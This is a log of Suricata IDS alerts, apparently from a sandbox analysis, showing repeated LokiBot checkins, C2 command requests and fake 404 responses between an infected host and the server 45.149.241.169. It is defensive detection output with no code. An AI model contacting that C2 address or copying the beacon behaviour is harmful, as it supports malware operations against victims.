Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64441 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64390 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64441 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64441 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64380 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64380 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:55843
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64380 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64390 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64449
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64390 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64368 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64374 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64403
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:49718 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64374 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64386 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64386 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64386 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:49714
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64374
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64443 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64421 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64443 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64421 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64443 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64386 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64441 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64368 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64405 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64386 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64383 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64405 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64385 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64405 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64372
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64432
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64382 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64382 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64405 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64382 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64380 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64385 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64434 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64380 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64383 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64421 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64373 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64373 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64382 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64373 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64382 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64421 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64421 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64382
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64373 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64421
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64445 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64445 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64390
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64445 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64445 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64428 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64428 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64428 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64428 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64428 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64445
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64443 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64443 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64443
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64440 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64361 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64361 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64361
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64397 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64397 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64397 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64373 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64441 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64375
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64397 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64386
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64358 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64358 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64411 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64411 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64411 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64358 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64358 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64427 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64427 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64427 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64439 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64439 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64358
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64439 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64427 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64427 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64427
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64439 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64434 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64434 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49715 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64385
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64397 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64434 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64434 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64440 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64438 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64438 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64441
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64438 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64355 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64355 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64438 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64355 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64438 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64371 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64397
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64355 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64355 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64355
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64411 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64411 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64440 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64418 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64399 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64418 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64399 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64418 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64359 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64359 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64440 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64440 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:49713
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64359 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64440
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64446 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64359 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64446 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64359 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64371 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64439 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64418 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64399 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64371 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64383 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64446 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64399 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64434
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64370 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64370 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64370 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64438
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64370 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64370 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64371 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64371 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64447 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64447 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64447 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64370
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64446 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64446 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64447 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64447 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64399 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64446
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64447
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64383 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64383 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64381 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64381 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64381 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64383
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64401 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64411
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64428
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64401 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64381 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64401 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64381 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64359
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64414 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64418 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64399
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64439
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64413 -> 45.149.241.169:80
